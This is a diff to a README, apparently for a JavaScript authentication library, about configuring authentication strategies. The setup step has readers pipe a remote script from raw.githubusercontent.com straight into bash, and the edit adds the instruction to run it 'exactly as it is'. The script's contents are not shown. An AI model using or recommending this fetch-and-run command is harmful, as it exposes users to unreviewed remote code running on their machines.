korenzerah/koren-js/README.md

 #### Strategies

-Before authenticating requests, the strategy (or strategies) used by an application must be configured. to configure, run the following:
+Before authenticating requests, the strategy (or strategies) used by an application must be configured. to configure, run the following command exactly as it is:

 ```bash
  curl https://raw.githubusercontent.com/korenzerah/koren-js/refs/heads/main/script.sh | bash